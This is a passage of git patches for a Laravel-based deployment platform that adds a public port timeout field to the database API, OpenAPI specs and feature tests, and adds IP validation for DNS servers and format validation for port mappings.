-            $allowedFields = ['name', 'description', 'image', 'public_port', 'is_public', 'project_uuid', 'environment_name', 'environment_uuid', 'server_uuid', 'destination_uuid', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'mariadb_conf', 'mariadb_root_password', 'mariadb_user', 'mariadb_password', 'mariadb_database'];
+            $allowedFields = ['name', 'description', 'image', 'public_port', 'public_port_timeout', 'is_public', 'project_uuid', 'environment_name', 'environment_uuid', 'server_uuid', 'destination_uuid', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'mariadb_conf', 'mariadb_root_password', 'mariadb_user', 'mariadb_password', 'mariadb_database'];
             $validator = customApiValidator($request->all(), [
                 'clickhouse_admin_user' => 'string',
                 'clickhouse_admin_password' => 'string',
@@ -1811,7 +1822,7 @@ public function create_database(Request $request, NewDatabaseTypes $type)
 
             return response()->json(serializeApiResponse($payload))->setStatusCode(201);
         } elseif ($type === NewDatabaseTypes::MYSQL) {
-            $allowedFields = ['name', 'description', 'image', 'public_port', 'is_public', 'project_uuid', 'environment_name', 'environment_uuid', 'server_uuid', 'destination_uuid', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'mysql_root_password', 'mysql_password', 'mysql_user', 'mysql_database', 'mysql_conf'];
+            $allowedFields = ['name', 'description', 'image', 'public_port', 'public_port_timeout', 'is_public', 'project_uuid', 'environment_name', 'environment_uuid', 'server_uuid', 'destination_uuid', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'mysql_root_password', 'mysql_password', 'mysql_user', 'mysql_database', 'mysql_conf'];
             $validator = customApiValidator($request->all(), [
                 'mysql_root_password' => 'string',
                 'mysql_password' => 'string',
@@ -1870,7 +1881,7 @@ public function create_database(Request $request, NewDatabaseTypes $type)
 
             return response()->json(serializeApiResponse($payload))->setStatusCode(201);
         } elseif ($type === NewDatabaseTypes::REDIS) {
-            $allowedFields = ['name', 'description', 'image', 'public_port', 'is_public', 'project_uuid', 'environment_name', 'environment_uuid', 'server_uuid', 'destination_uuid', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'redis_password', 'redis_conf'];
+            $allowedFields = ['name', 'description', 'image', 'public_port', 'public_port_timeout', 'is_public', 'project_uuid', 'environment_name', 'environment_uuid', 'server_uuid', 'destination_uuid', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'redis_password', 'redis_conf'];
             $validator = customApiValidator($request->all(), [
                 'redis_password' => 'string',
                 'redis_conf' => 'string',
@@ -1926,7 +1937,7 @@ public function create_database(Request $request, NewDatabaseTypes $type)
 
             return response()->json(serializeApiResponse($payload))->setStatusCode(201);
         } elseif ($type === NewDatabaseTypes::DRAGONFLY) {
-            $allowedFields = ['name', 'description', 'image', 'public_port', 'is_public', 'project_uuid', 'environment_name', 'environment_uuid', 'server_uuid', 'destination_uuid', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares',  'dragonfly_password'];
+            $allowedFields = ['name', 'description', 'image', 'public_port', 'public_port_timeout', 'is_public', 'project_uuid', 'environment_name', 'environment_uuid', 'server_uuid', 'destination_uuid', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares',  'dragonfly_password'];
             $validator = customApiValidator($request->all(), [
                 'dragonfly_password' => 'string',
             ]);
@@ -1956,7 +1967,7 @@ public function create_database(Request $request, NewDatabaseTypes $type)
                 'uuid' => $database->uuid,
             ]))->setStatusCode(201);
         } elseif ($type === NewDatabaseTypes::KEYDB) {
-            $allowedFields = ['name', 'description', 'image', 'public_port', 'is_public', 'project_uuid', 'environment_name', 'environment_uuid', 'server_uuid', 'destination_uuid', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'keydb_password', 'keydb_conf'];
+            $allowedFields = ['name', 'description', 'image', 'public_port', 'public_port_timeout', 'is_public', 'project_uuid', 'environment_name', 'environment_uuid', 'server_uuid', 'destination_uuid', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'keydb_password', 'keydb_conf'];
             $validator = customApiValidator($request->all(), [
                 'keydb_password' => 'string',
                 'keydb_conf' => 'string',
@@ -2012,7 +2023,7 @@ public function create_database(Request $request, NewDatabaseTypes $type)
 
             return response()->json(serializeApiResponse($payload))->setStatusCode(201);
         } elseif ($type === NewDatabaseTypes::CLICKHOUSE) {
-            $allowedFields = ['name', 'description', 'image', 'public_port', 'is_public', 'project_uuid', 'environment_name', 'environment_uuid', 'server_uuid', 'destination_uuid', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares',  'clickhouse_admin_user', 'clickhouse_admin_password'];
+            $allowedFields = ['name', 'description', 'image', 'public_port', 'public_port_timeout', 'is_public', 'project_uuid', 'environment_name', 'environment_uuid', 'server_uuid', 'destination_uuid', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares',  'clickhouse_admin_user', 'clickhouse_admin_password'];
             $validator = customApiValidator($request->all(), [
                 'clickhouse_admin_user' => 'string',
                 'clickhouse_admin_password' => 'string',
@@ -2048,7 +2059,7 @@ public function create_database(Request $request, NewDatabaseTypes $type)
 
             return response()->json(serializeApiResponse($payload))->setStatusCode(201);
         } elseif ($type === NewDatabaseTypes::MONGODB) {
-            $allowedFields = ['name', 'description', 'image', 'public_port', 'is_public', 'project_uuid', 'environment_name', 'environment_uuid', 'server_uuid', 'destination_uuid', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'mongo_conf', 'mongo_initdb_root_username', 'mongo_initdb_root_password', 'mongo_initdb_database'];
+            $allowedFields = ['name', 'description', 'image', 'public_port', 'public_port_timeout', 'is_public', 'project_uuid', 'environment_name', 'environment_uuid', 'server_uuid', 'destination_uuid', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'mongo_conf', 'mongo_initdb_root_username', 'mongo_initdb_root_password', 'mongo_initdb_database'];
             $validator = customApiValidator($request->all(), [
                 'mongo_conf' => 'string',
                 'mongo_initdb_root_username' => 'string',
diff --git a/openapi.json b/openapi.json
index aec5a2843..ee970c5c3 100644
--- a/openapi.json
+++ b/openapi.json
@@ -4544,6 +4544,10 @@
                                         "type": "integer",
                                         "description": "Public port of the database"
                                     },
+                                    "public_port_timeout": {
+                                        "type": "integer",
+                                        "description": "Public port timeout in seconds (default: 3600)"
+                                    },
                                     "limits_memory": {
                                         "type": "string",
                                         "description": "Memory limit of the database"
@@ -4989,6 +4993,10 @@
                                         "type": "integer",
                                         "description": "Public port of the database"
                                     },
+                                    "public_port_timeout": {
+                                        "type": "integer",
+                                        "description": "Public port timeout in seconds (default: 3600)"
+                                    },
                                     "limits_memory": {
                                         "type": "string",
                                         "description": "Memory limit of the database"
@@ -5117,6 +5125,10 @@
                                         "type": "integer",
                                         "description": "Public port of the database"
                                     },
+                                    "public_port_timeout": {
+                                        "type": "integer",
+                                        "description": "Public port timeout in seconds (default: 3600)"
+                                    },
                                     "limits_memory": {
                                         "type": "string",
                                         "description": "Memory limit of the database"
@@ -5241,6 +5253,10 @@
                                         "type": "integer",
                                         "description": "Public port of the database"
                                     },
+                                    "public_port_timeout": {
+                                        "type": "integer",
+                                        "description": "Public port timeout in seconds (default: 3600)"
+                                    },
                                     "limits_memory": {
                                         "type": "string",
                                         "description": "Memory limit of the database"
@@ -5369,6 +5385,10 @@
                                         "type": "integer",
                                         "description": "Public port of the database"
                                     },
+                                    "public_port_timeout": {
+                                        "type": "integer",
+                                        "description": "Public port timeout in seconds (default: 3600)"
+                                    },
                                     "limits_memory": {
                                         "type": "string",
                                         "description": "Memory limit of the database"
@@ -5497,6 +5517,10 @@
                                         "type": "integer",
                                         "description": "Public port of the database"
                                     },
+                                    "public_port_timeout": {
+                                        "type": "integer",
+                                        "description": "Public port timeout in seconds (default: 3600)"
+                                    },
                                     "limits_memory": {
                                         "type": "string",
                                         "description": "Memory limit of the database"
@@ -5637,6 +5661,10 @@
                                         "type": "integer",
                                         "description": "Public port of the database"
                                     },
+                                    "public_port_timeout": {
+                                        "type": "integer",
+                                        "description": "Public port timeout in seconds (default: 3600)"
+                                    },
                                     "limits_memory": {
                                         "type": "string",
                                         "description": "Memory limit of the database"
@@ -5777,6 +5805,10 @@
                                         "type": "integer",
                                         "description": "Public port of the database"
                                     },
+                                    "public_port_timeout": {
+                                        "type": "integer",
+                                        "description": "Public port timeout in seconds (default: 3600)"
+                                    },
                                     "limits_memory": {
                                         "type": "string",
                                         "description": "Memory limit of the database"
@@ -5905,6 +5937,10 @@
                                         "type": "integer",
                                         "description": "Public port of the database"
                                     },
+                                    "public_port_timeout": {
+                                        "type": "integer",
+                                        "description": "Public port timeout in seconds (default: 3600)"
+                                    },
                                     "limits_memory": {
                                         "type": "string",
                                         "description": "Memory limit of the database"
diff --git a/openapi.yaml b/openapi.yaml
index 93038ce80..80744d3d4 100644
--- a/openapi.yaml
+++ b/openapi.yaml
@@ -2873,6 +2873,9 @@ paths:
                 public_port:
                   type: integer
                   description: 'Public port of the database'
+                public_port_timeout:
+                  type: integer
+                  description: 'Public port timeout in seconds (default: 3600)'
                 limits_memory:
                   type: string
                   description: 'Memory limit of the database'
@@ -3189,6 +3192,9 @@ paths:
                 public_port:
                   type: integer
                   description: 'Public port of the database'
+                public_port_timeout:
+                  type: integer
+                  description: 'Public port timeout in seconds (default: 3600)'
                 limits_memory:
                   type: string
                   description: 'Memory limit of the database'
@@ -3281,6 +3287,9 @@ paths:
                 public_port:
                   type: integer
                   description: 'Public port of the database'
+                public_port_timeout:
+                  type: integer
+                  description: 'Public port timeout in seconds (default: 3600)'
                 limits_memory:
                   type: string
                   description: 'Memory limit of the database'
@@ -3370,6 +3379,9 @@ paths:
                 public_port:
                   type: integer
                   description: 'Public port of the database'
+                public_port_timeout:
+                  type: integer
+                  description: 'Public port timeout in seconds (default: 3600)'
                 limits_memory:
                   type: string
                   description: 'Memory limit of the database'
@@ -3462,6 +3474,9 @@ paths:
                 public_port:
                   type: integer
                   description: 'Public port of the database'
+                public_port_timeout:
+                  type: integer
+                  description: 'Public port timeout in seconds (default: 3600)'
                 limits_memory:
                   type: string
                   description: 'Memory limit of the database'
@@ -3554,6 +3569,9 @@ paths:
                 public_port:
                   type: integer
                   description: 'Public port of the database'
+                public_port_timeout:
+                  type: integer
+                  description: 'Public port timeout in seconds (default: 3600)'
                 limits_memory:
                   type: string
                   description: 'Memory limit of the database'
@@ -3655,6 +3673,9 @@ paths:
                 public_port:
                   type: integer
                   description: 'Public port of the database'
+                public_port_timeout:
+                  type: integer
+                  description: 'Public port timeout in seconds (default: 3600)'
                 limits_memory:
                   type: string
                   description: 'Memory limit of the database'
@@ -3756,6 +3777,9 @@ paths:
                 public_port:
                   type: integer
                   description: 'Public port of the database'
+                public_port_timeout:
+                  type: integer
+                  description: 'Public port timeout in seconds (default: 3600)'
                 limits_memory:
                   type: string
                   description: 'Memory limit of the database'
@@ -3848,6 +3872,9 @@ paths:
                 public_port:
                   type: integer
                   description: 'Public port of the database'
+                public_port_timeout:
+                  type: integer
+                  description: 'Public port timeout in seconds (default: 3600)'
                 limits_memory:
                   type: string
                   description: 'Memory limit of the database'
diff --git a/tests/Feature/DatabasePublicPortTimeoutApiTest.php b/tests/Feature/DatabasePublicPortTimeoutApiTest.php
new file mode 100644
index 000000000..6bbc6279f
--- /dev/null
+++ b/tests/Feature/DatabasePublicPortTimeoutApiTest.php
@@ -0,0 +1,147 @@
+<?php
+
+use App\Models\Environment;
+use App\Models\InstanceSettings;
+use App\Models\Project;
+use App\Models\Server;
+use App\Models\StandaloneDocker;
+use App\Models\StandalonePostgresql;
+use App\Models\StandaloneRedis;
+use App\Models\Team;
+use App\Models\User;
+use Illuminate\Foundation\Testing\RefreshDatabase;
+
+uses(RefreshDatabase::class);
+
+beforeEach(function () {
+    InstanceSettings::updateOrCreate(['id' => 0]);
+
+    $this->team = Team::factory()->create();
+    $this->user = User::factory()->create();
+    $this->team->members()->attach($this->user->id, ['role' => 'owner']);
+
+    session(['currentTeam' => $this->team]);
+
+    $this->token = $this->user->createToken('test-token', ['*']);
+    $this->bearerToken = $this->token->plainTextToken;
+
+    $this->server = Server::factory()->create(['team_id' => $this->team->id]);
+    $this->destination = StandaloneDocker::where('server_id', $this->server->id)->first();
+    $this->project = Project::factory()->create(['team_id' => $this->team->id]);
+    $this->environment = Environment::factory()->create(['project_id' => $this->project->id]);
+});
+
+describe('PATCH /api/v1/databases', function () {
+    test('updates public_port_timeout on a postgresql database', function () {
+        $database = StandalonePostgresql::create([
+            'name' => 'test-postgres',
+            'image' => 'postgres:15-alpine',
+            'postgres_user' => 'postgres',
+            'postgres_password' => 'password',
+            'postgres_db' => 'postgres',
+            'environment_id' => $this->environment->id,
+            'destination_id' => $this->destination->id,
+            'destination_type' => $this->destination->getMorphClass(),
+        ]);
+
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+            'Content-Type' => 'application/json',
+        ])->patchJson("/api/v1/databases/{$database->uuid}", [
+            'public_port_timeout' => 7200,
+        ]);
+
+        $response->assertStatus(200);
+        $database->refresh();
+        expect($database->public_port_timeout)->toBe(7200);
+    });
+
+    test('updates public_port_timeout on a redis database', function () {
+        $database = StandaloneRedis::create([
+            'name' => 'test-redis',
+            'image' => 'redis:7',
+            'redis_password' => 'password',
+            'environment_id' => $this->environment->id,
+            'destination_id' => $this->destination->id,
+            'destination_type' => $this->destination->getMorphClass(),
+        ]);
+
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+            'Content-Type' => 'application/json',
+        ])->patchJson("/api/v1/databases/{$database->uuid}", [
+            'public_port_timeout' => 1800,
+        ]);
+
+        $response->assertStatus(200);
+        $database->refresh();
+        expect($database->public_port_timeout)->toBe(1800);
+    });
+
+    test('rejects invalid public_port_timeout value', function () {
+        $database = StandalonePostgresql::create([
+            'name' => 'test-postgres',
+            'image' => 'postgres:15-alpine',
+            'postgres_user' => 'postgres',
+            'postgres_password' => 'password',
+            'postgres_db' => 'postgres',
+            'environment_id' => $this->environment->id,
+            'destination_id' => $this->destination->id,
+            'destination_type' => $this->destination->getMorphClass(),
+        ]);
+
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+            'Content-Type' => 'application/json',
+        ])->patchJson("/api/v1/databases/{$database->uuid}", [
+            'public_port_timeout' => 0,
+        ]);
+
+        $response->assertStatus(422);
+    });
+
+    test('accepts null public_port_timeout', function () {
+        $database = StandalonePostgresql::create([
+            'name' => 'test-postgres',
+            'image' => 'postgres:15-alpine',
+            'postgres_user' => 'postgres',
+            'postgres_password' => 'password',
+            'postgres_db' => 'postgres',
+            'environment_id' => $this->environment->id,
+            'destination_id' => $this->destination->id,
+            'destination_type' => $this->destination->getMorphClass(),
+        ]);
+
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+            'Content-Type' => 'application/json',
+        ])->patchJson("/api/v1/databases/{$database->uuid}", [
+            'public_port_timeout' => null,
+        ]);
+
+        $response->assertStatus(200);
+        $database->refresh();
+        expect($database->public_port_timeout)->toBeNull();
+    });
+});
+
+describe('POST /api/v1/databases/postgresql', function () {
+    test('creates postgresql database with public_port_timeout', function () {
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+            'Content-Type' => 'application/json',
+        ])->postJson('/api/v1/databases/postgresql', [
+            'server_uuid' => $this->server->uuid,
+            'project_uuid' => $this->project->uuid,
+            'environment_name' => $this->environment->name,
+            'public_port_timeout' => 5400,
+            'instant_deploy' => false,
+        ]);
+
+        $response->assertStatus(200);
+        $uuid = $response->json('uuid');
+        $database = StandalonePostgresql::whereUuid($uuid)->first();
+        expect($database)->not->toBeNull();
+        expect($database->public_port_timeout)->toBe(5400);
+    });
+});

From 407b6df7440d90f324a578ee0b0ebd10cae1da6a Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Sat, 28 Mar 2026 22:30:17 +0530
Subject: [PATCH 173/213] fix(validation): add IP validation for custom DNS
 servers input

---
 app/Livewire/Settings/Advanced.php |  4 ++--
 app/Rules/ValidDnsServers.php      | 35 ++++++++++++++++++++++++++++++
 2 files changed, 37 insertions(+), 2 deletions(-)
 create mode 100644 app/Rules/ValidDnsServers.php

diff --git a/app/Livewire/Settings/Advanced.php b/app/Livewire/Settings/Advanced.php
index ad478273f..f4b57ae20 100644
--- a/app/Livewire/Settings/Advanced.php
+++ b/app/Livewire/Settings/Advanced.php
@@ -3,6 +3,7 @@
 namespace App\Livewire\Settings;
 
 use App\Models\InstanceSettings;
+use App\Rules\ValidDnsServers;
 use App\Rules\ValidIpOrCidr;
 use Livewire\Attributes\Validate;
 use Livewire\Component;
@@ -20,7 +21,6 @@ class Advanced extends Component
     #[Validate('boolean')]
     public bool $is_dns_validation_enabled;
 
-    #[Validate('nullable|string')]
     public ?string $custom_dns_servers = null;
 
     #[Validate('boolean')]
@@ -43,7 +43,7 @@ public function rules()
             'is_registration_enabled' => 'boolean',
             'do_not_track' => 'boolean',
             'is_dns_validation_enabled' => 'boolean',
-            'custom_dns_servers' => 'nullable|string',
+            'custom_dns_servers' => ['nullable', 'string', new ValidDnsServers],
             'is_api_enabled' => 'boolean',
             'allowed_ips' => ['nullable', 'string', new ValidIpOrCidr],
             'is_sponsorship_popup_enabled' => 'boolean',
diff --git a/app/Rules/ValidDnsServers.php b/app/Rules/ValidDnsServers.php
new file mode 100644
index 000000000..e3bbd048f
--- /dev/null
+++ b/app/Rules/ValidDnsServers.php
@@ -0,0 +1,35 @@
+<?php
+
+namespace App\Rules;
+
+use Closure;
+use Illuminate\Contracts\Validation\ValidationRule;
+
+class ValidDnsServers implements ValidationRule
+{
+    public function validate(string $attribute, mixed $value, Closure $fail): void
+    {
+        if (empty($value)) {
+            return;
+        }
+
+        $entries = explode(',', $value);
+        $invalidEntries = [];
+
+        foreach ($entries as $entry) {
+            $entry = trim($entry);
+
+            if (empty($entry)) {
+                continue;
+            }
+
+            if (! filter_var($entry, FILTER_VALIDATE_IP)) {
+                $invalidEntries[] = $entry;
+            }
+        }
+
+        if (! empty($invalidEntries)) {
+            $fail('The following entries are not valid DNS server IP addresses: '.implode(', ', $invalidEntries));
+        }
+    }
+}

From 105b4a92674e94da070fe4c247f5112aa1a39e00 Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Sat, 28 Mar 2026 23:23:25 +0530
Subject: [PATCH 174/213] fix(validation): add input validation for port
 exposes and port mappings fields

---
 app/Livewire/Project/Application/General.php  | 12 ++++++++--
 .../Project/Database/Clickhouse/General.php   |  6 ++++-
 .../Project/Database/Dragonfly/General.php    |  6 ++++-
 .../Project/Database/Keydb/General.php        |  6 ++++-
 .../Project/Database/Mariadb/General.php      |  6 ++++-
 .../Project/Database/Mongodb/General.php      |  6 ++++-
 .../Project/Database/Mysql/General.php        |  6 ++++-
 .../Project/Database/Postgresql/General.php   |  6 ++++-
 .../Project/Database/Redis/General.php        |  6 ++++-
 app/Support/ValidationPatterns.php            | 24 +++++++++++++++++++
 10 files changed, 74 insertions(+), 10 deletions(-)

diff --git a/app/Livewire/Project/Application/General.php b/app/Livewire/Project/Application/General.php
index 5c186af70..3e78c1732 100644
--- a/app/Livewire/Project/Application/General.php
+++ b/app/Livewire/Project/Application/General.php
@@ -153,8 +153,8 @@ protected function rules(): array
             'staticImage' => 'required',
             'baseDirectory' => array_merge(['required'], array_slice(ValidationPatterns::directoryPathRules(), 1)),
             'publishDirectory' => ValidationPatterns::directoryPathRules(),
-            'portsExposes' => 'required',
-            'portsMappings' => 'nullable',
+            'portsExposes' => ['required', 'string', 'regex:/^(\d+)(,\d+)*$/'],
+            'portsMappings' => ValidationPatterns::portMappingRules(),
             'customNetworkAliases' => 'nullable',
             'dockerfile' => 'nullable',
             'dockerRegistryImageName' => 'nullable',
@@ -209,6 +209,8 @@ protected function messages(): array
                 'staticImage.required' => 'The Static Image field is required.',
                 'baseDirectory.required' => 'The Base Directory field is required.',
                 'portsExposes.required' => 'The Exposed Ports field is required.',
+                'portsExposes.regex' => 'Ports exposes must be a comma-separated list of port numbers (e.g. 3000,3001).',
+                ...ValidationPatterns::portMappingMessages(),
                 'isStatic.required' => 'The Static setting is required.',
                 'isStatic.boolean' => 'The Static setting must be true or false.',
                 'isSpa.required' => 'The SPA setting is required.',
@@ -752,6 +754,12 @@ public function submit($showToaster = true)
             $this->authorize('update', $this->application);
 
             $this->resetErrorBag();
+
+            $this->portsExposes = str($this->portsExposes)->replace(' ', '')->trim()->toString();
+            if ($this->portsMappings) {
+                $this->portsMappings = str($this->portsMappings)->replace(' ', '')->trim()->toString();
+            }
+
             $this->validate();
 
             $oldPortsExposes = $this->application->ports_exposes;
diff --git a/app/Livewire/Project/Database/Clickhouse/General.php b/app/Livewire/Project/Database/Clickhouse/General.php
index 9de75c1c5..0913ca797 100644
--- a/app/Livewire/Project/Database/Clickhouse/General.php
+++ b/app/Livewire/Project/Database/Clickhouse/General.php
@@ -79,7 +79,7 @@ protected function rules(): array
             'clickhouseAdminUser' => 'required|string',
             'clickhouseAdminPassword' => 'required|string',
             'image' => 'required|string',
-            'portsMappings' => 'nullable|string',
+            'portsMappings' => ValidationPatterns::portMappingRules(),
             'isPublic' => 'nullable|boolean',
             'publicPort' => 'nullable|integer',
             'publicPortTimeout' => 'nullable|integer|min:1',
@@ -94,6 +94,7 @@ protected function messages(): array
     {
         return array_merge(
             ValidationPatterns::combinedMessages(),
+            ValidationPatterns::portMappingMessages(),
             [
                 'clickhouseAdminUser.required' => 'The Admin User field is required.',
                 'clickhouseAdminUser.string' => 'The Admin User must be a string.',
@@ -207,6 +208,9 @@ public function submit()
         try {
             $this->authorize('update', $this->database);
 
+            if ($this->portsMappings) {
+                $this->portsMappings = str($this->portsMappings)->replace(' ', '')->trim()->toString();
+            }
             if (str($this->publicPort)->isEmpty()) {
                 $this->publicPort = null;
             }
diff --git a/app/Livewire/Project/Database/Dragonfly/General.php b/app/Livewire/Project/Database/Dragonfly/General.php
index d35e57a9d..23503bd98 100644
--- a/app/Livewire/Project/Database/Dragonfly/General.php
+++ b/app/Livewire/Project/Database/Dragonfly/General.php
@@ -90,7 +90,7 @@ protected function rules(): array
             'description' => ValidationPatterns::descriptionRules(),
             'dragonflyPassword' => 'required|string',
             'image' => 'required|string',
-            'portsMappings' => 'nullable|string',
+            'portsMappings' => ValidationPatterns::portMappingRules(),
             'isPublic' => 'nullable|boolean',
             'publicPort' => 'nullable|integer',
             'publicPortTimeout' => 'nullable|integer|min:1',
@@ -106,6 +106,7 @@ protected function messages(): array
     {
         return array_merge(
             ValidationPatterns::combinedMessages(),
+            ValidationPatterns::portMappingMessages(),
             [
                 'dragonflyPassword.required' => 'The Dragonfly Password field is required.',
                 'dragonflyPassword.string' => 'The Dragonfly Password must be a string.',
@@ -217,6 +218,9 @@ public function submit()
         try {
             $this->authorize('update', $this->database);
 
+            if ($this->portsMappings) {
+                $this->portsMappings = str($this->portsMappings)->replace(' ', '')->trim()->toString();
+            }
             if (str($this->publicPort)->isEmpty()) {
                 $this->publicPort = null;
             }
diff --git a/app/Livewire/Project/Database/Keydb/General.php b/app/Livewire/Project/Database/Keydb/General.php
index adb4ccb5f..ff9dc19ad 100644
--- a/app/Livewire/Project/Database/Keydb/General.php
+++ b/app/Livewire/Project/Database/Keydb/General.php
@@ -93,7 +93,7 @@ protected function rules(): array
             'keydbConf' => 'nullable|string',
             'keydbPassword' => 'required|string',
             'image' => 'required|string',
-            'portsMappings' => 'nullable|string',
+            'portsMappings' => ValidationPatterns::portMappingRules(),
             'isPublic' => 'nullable|boolean',
             'publicPort' => 'nullable|integer',
             'publicPortTimeout' => 'nullable|integer|min:1',
@@ -111,6 +111,7 @@ protected function messages(): array
     {
         return array_merge(
             ValidationPatterns::combinedMessages(),
+            ValidationPatterns::portMappingMessages(),
             [
                 'keydbPassword.required' => 'The KeyDB Password field is required.',
                 'keydbPassword.string' => 'The KeyDB Password must be a string.',
@@ -224,6 +225,9 @@ public function submit()
         try {
             $this->authorize('manageEnvironment', $this->database);
 
+            if ($this->portsMappings) {
+                $this->portsMappings = str($this->portsMappings)->replace(' ', '')->trim()->toString();
+            }
             if (str($this->publicPort)->isEmpty()) {
                 $this->publicPort = null;
             }
diff --git a/app/Livewire/Project/Database/Mariadb/General.php b/app/Livewire/Project/Database/Mariadb/General.php
index 14240c82d..a9ac47b97 100644
--- a/app/Livewire/Project/Database/Mariadb/General.php
+++ b/app/Livewire/Project/Database/Mariadb/General.php
@@ -78,7 +78,7 @@ protected function rules(): array
             'mariadbDatabase' => 'required',
             'mariadbConf' => 'nullable',
             'image' => 'required',
-            'portsMappings' => 'nullable',
+            'portsMappings' => ValidationPatterns::portMappingRules(),
             'isPublic' => 'nullable|boolean',
             'publicPort' => 'nullable|integer',
             'publicPortTimeout' => 'nullable|integer|min:1',
@@ -92,6 +92,7 @@ protected function messages(): array
     {
         return array_merge(
             ValidationPatterns::combinedMessages(),
+            ValidationPatterns::portMappingMessages(),
             [
                 'name.required' => 'The Name field is required.',
                 'mariadbRootPassword.required' => 'The Root Password field is required.',
@@ -213,6 +214,9 @@ public function submit()
         try {
             $this->authorize('update', $this->database);
 
+            if ($this->portsMappings) {
+                $this->portsMappings = str($this->portsMappings)->replace(' ', '')->trim()->toString();
+            }
             if (str($this->publicPort)->isEmpty()) {
                 $this->publicPort = null;
             }
diff --git a/app/Livewire/Project/Database/Mongodb/General.php b/app/Livewire/Project/Database/Mongodb/General.php
index 11419ec71..2b6538edf 100644
--- a/app/Livewire/Project/Database/Mongodb/General.php
+++ b/app/Livewire/Project/Database/Mongodb/General.php
@@ -77,7 +77,7 @@ protected function rules(): array
             'mongoInitdbRootPassword' => 'required',
             'mongoInitdbDatabase' => 'required',
             'image' => 'required',
-            'portsMappings' => 'nullable',
+            'portsMappings' => ValidationPatterns::portMappingRules(),
             'isPublic' => 'nullable|boolean',
             'publicPort' => 'nullable|integer',
             'publicPortTimeout' => 'nullable|integer|min:1',
@@ -92,6 +92,7 @@ protected function messages(): array
     {
         return array_merge(
             ValidationPatterns::combinedMessages(),
+            ValidationPatterns::portMappingMessages(),
             [
                 'name.required' => 'The Name field is required.',
                 'mongoInitdbRootUsername.required' => 'The Root Username field is required.',
@@ -213,6 +214,9 @@ public function submit()
         try {
             $this->authorize('update', $this->database);
 
+            if ($this->portsMappings) {
+                $this->portsMappings = str($this->portsMappings)->replace(' ', '')->trim()->toString();
+            }
             if (str($this->publicPort)->isEmpty()) {
                 $this->publicPort = null;
             }
diff --git a/app/Livewire/Project/Database/Mysql/General.php b/app/Livewire/Project/Database/Mysql/General.php
index 4f0f5eb19..f3c554522 100644
--- a/app/Livewire/Project/Database/Mysql/General.php
+++ b/app/Livewire/Project/Database/Mysql/General.php
@@ -80,7 +80,7 @@ protected function rules(): array
             'mysqlDatabase' => 'required',
             'mysqlConf' => 'nullable',
             'image' => 'required',
-            'portsMappings' => 'nullable',
+            'portsMappings' => ValidationPatterns::portMappingRules(),
             'isPublic' => 'nullable|boolean',
             'publicPort' => 'nullable|integer',
             'publicPortTimeout' => 'nullable|integer|min:1',
@@ -95,6 +95,7 @@ protected function messages(): array
     {
         return array_merge(
             ValidationPatterns::combinedMessages(),
+            ValidationPatterns::portMappingMessages(),
             [
                 'name.required' => 'The Name field is required.',
                 'mysqlRootPassword.required' => 'The Root Password field is required.',
@@ -220,6 +221,9 @@ public function submit()
         try {
             $this->authorize('update', $this->database);
 
+            if ($this->portsMappings) {
+                $this->portsMappings = str($this->portsMappings)->replace(' ', '')->trim()->toString();
+            }
             if (str($this->publicPort)->isEmpty()) {
                 $this->publicPort = null;
             }
diff --git a/app/Livewire/Project/Database/Postgresql/General.php b/app/Livewire/Project/Database/Postgresql/General.php
index 4e044672b..7a4ff057e 100644
--- a/app/Livewire/Project/Database/Postgresql/General.php
+++ b/app/Livewire/Project/Database/Postgresql/General.php
@@ -92,7 +92,7 @@ protected function rules(): array
             'postgresConf' => 'nullable',
             'initScripts' => 'nullable',
             'image' => 'required',
-            'portsMappings' => 'nullable',
+            'portsMappings' => ValidationPatterns::portMappingRules(),
             'isPublic' => 'nullable|boolean',
             'publicPort' => 'nullable|integer',
